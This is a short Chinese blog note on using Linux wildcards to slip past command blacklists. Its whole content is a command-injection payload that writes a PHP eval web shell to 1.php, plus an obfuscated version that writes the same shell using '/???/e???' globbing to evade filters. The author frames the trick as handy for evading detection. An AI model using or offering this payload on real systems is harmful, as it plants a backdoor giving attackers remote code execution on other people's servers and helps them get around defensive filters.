Linux通配符绕过文件名黑名单

文章来源:
http://www.sohu.com/a/235200861_658302

通配符绕过黑名单,做免杀还是蛮有意思的,先做记录

1.原本的payload

cmd=/bin/echo "<?php eval($_POST['cmd'])?>" > 1.php

2.变形后的payload:

cmd=/???/e??? "<?php eval($_POST['cmd'])?>" > 1.php

-------------本文结束❤感谢阅读-------------